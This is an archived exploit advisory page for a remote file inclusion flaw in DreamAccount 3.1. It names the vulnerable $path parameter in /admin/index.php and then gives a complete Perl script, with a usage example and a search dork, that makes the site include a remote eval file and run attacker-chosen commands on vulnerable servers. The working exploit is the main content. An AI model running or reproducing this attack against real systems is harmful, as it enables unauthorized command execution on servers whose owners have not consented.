TUCoPS :: Web :: Apps :: b06-3234.htm

DREAMACCOUNT V3.1 Remote Command Execution Exploit
DREAMACCOUNT V3.1 Remote Command Execution Exploit
DREAMACCOUNT V3.1 Remote Command Execution Exploit


----------------------------------------------------=0D
DREAMACCOUNT V3.1 Command Execution Exploit         =0D
----------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)=0D
Coded By Drago84(Exclusive Security Team)           =0D
----------------------------------------------------=0D
site of script:http://dreamcost.com =0D 
----------------------------------------------------=0D
Vulnerable: DREAMACCOUNT V3.1                       =0D
----------------------------------------------------=0D
vulnerable file :                                    =0D
------------------                                  =0D
/admin/index.php                                    =0D
----------------------------------------------------=0D
vulnerable code:                                    =0D
----------------------------------------------------=0D
require($path . "setup.php");                       =0D
require($path . "functions.php");                   =0D
require($path . "payment_processing.inc.php");        =0D
$path parameter File inclusion                      =0D
----------------------------------------------------=0D
#!/usr/bin/perl=0D
use HTTP::Request;=0D
use LWP::UserAgent;=0D
print "\n=============================================================================\r\n";=0D
print " * Dreamaccount Remote Command Execution  23/06/06 *\r\n";   =0D
print "=============================================================================\r\n";=0D
print "[*] dork:\"powered by DreamAccount 3.1\"\n";=0D
print "[*] Coded By : Drago84 \n";=0D
print "[*] Discovered by CrAsH_oVeR_rIdE\n";=0D
print "[*] Use    \n";=0D
print " Into the Eval Site it must be:\n\n";=0D
print " Exclusive  /Exclusive";=0D
=0D
if (@ARGV < 4)=0D
{=0D
print "\n\n[*] usage: perl dream.pl    \n";=0D
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";=0D 
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";=0D
exit();=0D
}=0D
my $dir=$ARGV[1];=0D
my $host=$ARGV[0];=0D
my $eval=$ARGV[2];=0D
my $cmd=$ARGV[3];=0D
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;=0D
print "\n";=0D
my $req=HTTP::Request->new(GET=>$url2);=0D
my $ua=LWP::UserAgent->new();=0D
$ua->timeout(10);=0D
my $response=$ua->request($req);=0D
if ($response->is_success) {=0D
print "\n\nResult of:".$cmd."\n";=0D
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );=0D
printf $1;=0D
$response->content;=0D
print "\n";=0D
=0D
} =0D
----------------------------------------------------------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
Coded By  Drago84=0D
E-mail:KARKOR23@hotmail.com=0D 
Site:www.lezr.com=0D 
Greetz:KING-HACKER,YOUNG_HACKER=0D
,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH